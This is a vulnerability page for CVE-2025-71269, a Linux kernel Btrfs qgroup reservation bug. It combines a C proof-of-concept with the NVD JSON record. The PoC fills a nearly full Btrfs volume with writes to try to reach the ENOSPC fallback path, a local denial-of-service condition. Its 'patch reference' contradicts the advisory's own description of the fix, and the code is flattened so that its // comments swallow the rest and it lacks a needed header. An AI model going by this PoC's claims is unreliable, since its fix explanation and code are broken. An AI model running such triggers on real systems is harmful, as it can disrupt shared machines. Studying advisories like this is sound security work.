CVE-2025-71269

// PoC for CVE-2025-71269: Btrfs qgroup data reservation incorrect free // This PoC demonstrates triggering the bug condition #include <stdio.h> #include <fcntl.h> #include <unistd.h> #include <sys/stat.h> #include <errno.h> /* * Prerequisites: * - Btrfs filesystem mounted * - Fill filesystem to near capacity to trigger -ENOSPC * * The vulnerability occurs when: * 1. Writing small files triggers inline extent creation * 2. -ENOSPC error occurs during inline extent allocation * 3. System falls back to COW path * 4. Incorrect qgroup data reservation release happens * * Note: This is a kernel-level vulnerability, exploitation requires * specific filesystem conditions and careful timing. */ int main() { const char *test_file = "/mnt/btrfs_test/testfile"; char buffer[1024]; // Fill the buffer with test data memset(buffer, 'A', sizeof(buffer)); // Create test file int fd = open(test_file, O_WRONLY | O_CREAT | O_TRUNC, 0644); if (fd < 0) { perror("Failed to create test file"); return 1; } // Write small chunks to trigger inline extent creation // Under near-capacity conditions, this may trigger -ENOSPC for (int i = 0; i < 1000; i++) { ssize_t written = write(fd, buffer, sizeof(buffer)); if (written < 0) { if (errno == ENOSPC) { printf("ENOSPC triggered at iteration %d\n", i); printf("Vulnerability condition may be met\n"); break; } perror("Write failed"); break; } } close(fd); printf("Test completed. Check dmesg for kernel warnings.\n"); return 0; } /* * Kernel patch reference (fixed version): * * - if (ret) * + if (ret > 0) * btrfs_free_qgroup_data(0, ins.objectid, ins.offset); * * The fix ensures qgroup data reservation is only freed when * not falling back to COW path (ret > 0 means failure without fallback). */

{"cve": {"id": "CVE-2025-71269", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2026-03-18T18:16:22.110", "lastModified": "2026-05-21T18:38:20.613", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nbtrfs: do not free data reservation in fallback from inline due to -ENOSPC\n\nIf we fail to create an inline extent due to -ENOSPC, we will attempt to\ngo through the normal COW path, reserve an extent, create an ordered\nextent, etc. However we were always freeing the reserved qgroup data,\nwhich is wrong since we will use data. Fix this by freeing the reserved\nqgroup data in __cow_file_range_inline() only if we are not doing the\nfallback (ret is <= 0)."}, {"lang": "es", "value": "En el kernel de Linux, la siguiente vulnerabilidad ha sido resuelta:\n\nbtrfs: no liberar la reserva de datos en la alternativa de inline debido a -ENOSPC\n\nSi fallamos al crear una extensión inline debido a -ENOSPC, intentaremos seguir la ruta COW normal, reservar una extensión, crear una extensión ordenada, etc. Sin embargo, siempre estábamos liberando los datos qgroup reservados, lo cual es incorrecto ya que usaremos los datos. Corregir esto liberando los datos qgroup reservados en __cow_file_range_inline() solo si no estamos realizando la alternativa (ret es &lt;= 0)."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.4", "versionEndExcluding": "6.1.168", "matchCriteriaId": "726D44CE-6870-4BF2-BF2A-36922E925B14"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.2", "versionEndExcluding": "6.6.134", "matchCriteriaId": "F56F925B-BAF8-4F4B-B62F-1496AF19A307"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.7", "versionEndExcluding": "6.12.81", "matchCriteriaId": "6EF80433-B33B-43C5-8E64-0FA7B8DCE1BC"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.13", "versionEndExcluding": "6.18.10", "matchCriteriaId": "7156C23F-009E-4D05-838C-A2DA417B5B8D"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.19:rc1:*:*:*:*:*:*", "matchCriteriaId": "17B67AA7-40D6-4AFA-8459-F200F3D7CFD1"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.19:rc2:*:*:*:*:*:*", "matchCriteriaId": "C47E4CC9-C826-4FA9-B014-7FE3D9B318B2"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.19:rc3:*:*:*:*:*:*", "matchCriteriaId": "F71D92C0-C023-48BD-B3B6-70B638EEE298"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.19:rc4:*:*:*:*:*:*", "matchCriteriaId": "13580667-0A98-40CC-B29F-D12790B91BDB"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/0a1fbbd780f04d1b6cf48dd327c866ba937de1c4", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/3a9fd45afadec1fbfec72057b9473d509fa8b68c", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/3edd1f6c7c520536b62b2904807033597554dbac", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/6de3a371a8b9fd095198b1aa68c22cc10a4c6961", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/f8da41de0bff9eb1d774a7253da0c9f637c4470a", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}]}}